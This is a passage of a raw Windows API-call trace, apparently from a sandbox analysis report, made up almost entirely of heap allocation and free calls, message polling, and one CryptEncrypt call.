lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0208.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0208.843] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e942d0*, pdwDataLen=0x8cef60*=0x13f94, dwBufLen=0x13f98 | out: pbData=0x2e942d0*, pdwDataLen=0x8cef60*=0x13f98) returned 1 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0208.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0208.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0208.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0208.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0208.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0208.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0208.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0208.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0208.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0208.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0208.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0208.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0208.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0208.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2ea8270 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0208.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2ebc210 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8270 | out: hHeap=0x970000) returned 1 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0208.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0208.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0208.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0208.858] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0208.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0208.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0208.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0208.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0208.859] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0208.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) 